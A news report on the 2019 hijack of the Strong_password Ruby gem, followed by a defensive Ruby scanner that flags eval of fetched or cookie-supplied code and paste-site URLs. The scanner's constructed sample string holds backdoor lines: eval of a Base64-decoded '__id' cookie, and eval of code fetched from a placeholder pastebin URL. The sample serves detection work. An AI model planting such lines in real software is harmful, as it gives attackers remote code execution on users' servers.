Malicious code substitution detected in the Strong_password Ruby package

The Strong_password 0.7 gem, published on June 25, was found to contain a malicious change (CVE-2019-13354) that loads and executes external code hosted on the Pastebin service under the control of an unknown attacker. The project has 247 thousand downloads in total, and version 0.6 about 38 thousand. The malicious version shows 537 downloads, but it is unclear how accurate this figure is, given that the release has already been removed from RubyGems.

The Strong_password library provides a means to check the strength of a password that a user sets during registration. Packages that use Strong_password include think_feel_do_engine (65k downloads), think_feel_do_dashboard (15k downloads) and superhosting (1.5 thousand). It is noted that the malicious change was added by an unknown person who took control of the repository from the author.

The malicious code was only added to RubyGems.org; the project's Git repository was not affected. The problem was identified after one of the developers using Strong_password in their projects began to wonder why the last change to the repository had been made more than 6 months ago, yet a new release had appeared on RubyGems, published on behalf of a new maintainer that no one had heard of before.

The attacker could have achieved arbitrary code execution on servers using the problematic version of Strong_password. At the time the problem was discovered, the script hosted on Pastebin arranged to launch any code transmitted by a client through the "__id" cookie, encoded with Base64. The malicious code also sent parameters of the host on which the malicious Strong_password variant was installed to a server controlled by the attacker.
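The behaviour described above (a second-stage script fetched from a paste site, request-supplied data Base64-decoded and handed to eval, none of it present in the project's Git history) is the kind of thing a static scan of installed gems can surface. The scanner below is an added example, not code from the article or from the Strong_password project; the two sample sources it scans are constructed for the illustration, and the pastebin URL in the tainted sample is a placeholder rather than the real one.

```ruby
# Added example: a small static scanner for indicators of a cookie-driven loader
# and of remote code fetched from a paste site inside gem source.
# Patterns are deliberately broad; every hit is a lead for manual review, not a verdict.

SUSPICIOUS_PATTERNS = {
  # Code fetched over HTTP and handed straight to eval / *_eval.
  eval_of_fetched_code:  /\b(?:eval|instance_eval|class_eval|module_eval)\s*\(?.*(?:Net::HTTP|URI\.open|open-uri|open\s*\(\s*["']https?:)/,
  # Base64-decoded data handed to eval (the "__id" cookie loader described above).
  eval_of_decoded_data:  /\b(?:eval|instance_eval|class_eval|module_eval)\s*\(?.*(?:decode64|unpack\s*\(\s*["']m)/,
  # Request-controlled input (cookies, params, headers) handed to eval.
  eval_of_request_input: /\b(?:eval|instance_eval|class_eval|module_eval)\s*\(?.*(?:cookies|request\.|params|HTTP_)/,
  # Hard-coded URLs to paste/sharing services; library code has little reason to carry these.
  paste_site_url:        %r{https?://(?:[\w.-]+\.)?(?:pastebin\.com|hastebin\.com|ghostbin\.co)}i,
}.freeze

# Scan one Ruby source string line by line; returns one finding per (line, rule) hit.
def scan_source(src, path = '(string)')
  findings = []
  src.each_line.with_index(1) do |line, lineno|
    SUSPICIOUS_PATTERNS.each do |rule, re|
      next unless line.match?(re)
      findings << { path: path, line: lineno, rule: rule, source: line.strip }
    end
  end
  findings
end

# Walk every gem RubyGems knows about on this machine and scan its .rb files.
# Opt-in (see the main guard) because it touches the whole local gem set.
def scan_installed_gems
  findings = []
  Gem::Specification.each do |spec|
    Dir.glob(File.join(spec.full_gem_path, '**', '*.rb')).each do |file|
      text = File.read(file, encoding: 'UTF-8').scrub  # tolerate odd encodings in vendored code
      findings.concat(scan_source(text, "#{spec.full_name}: #{file}"))
    end
  end
  findings
end

# Constructed tainted sample modelled on the article's description; not the real gem code.
SAMPLE_TAINTED = <<~RUBY
  # constructed sample, not the real gem code
  require "base64"
  require "open-uri"
  module StrongPassword
    class Loader
      def self.run(cookies)
        eval(Base64.decode64(cookies["__id"].to_s))
      end
    end
  end
  STAGE2 = "https://pastebin.com/raw/EXAMPLE"  # constructed placeholder URL
  eval(URI.open(STAGE2).read)
RUBY

# Constructed benign sample: a plain strength check with no dynamic evaluation.
SAMPLE_BENIGN = <<~RUBY
  module StrongPassword
    class StrengthChecker
      def initialize(password)
        @password = password
      end

      def strong?(min_length: 12)
        @password.length >= min_length && @password.match?(/[^a-z]/)
      end
    end
  end
RUBY

if __FILE__ == $PROGRAM_NAME
  target = ARGV.include?('--installed') ? scan_installed_gems : scan_source(SAMPLE_TAINTED, 'sample_tainted.rb')
  target.each { |f| puts "#{f[:path]}:#{f[:line]} [#{f[:rule]}] #{f[:source]}" }
  puts "benign sample: #{scan_source(SAMPLE_BENIGN).length} findings"
end
```

Run the file as-is to see the four hits on the constructed tainted sample (two on the cookie line, one on the URL literal, one on the remote eval) and zero on the benign sample; pass `--installed` to sweep the local gem set. A scan like this is a cheap complement to the check that actually caught this case: comparing a gem's publish date and publisher against the upstream repository's recent activity and known maintainers.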

Source: opennet.ru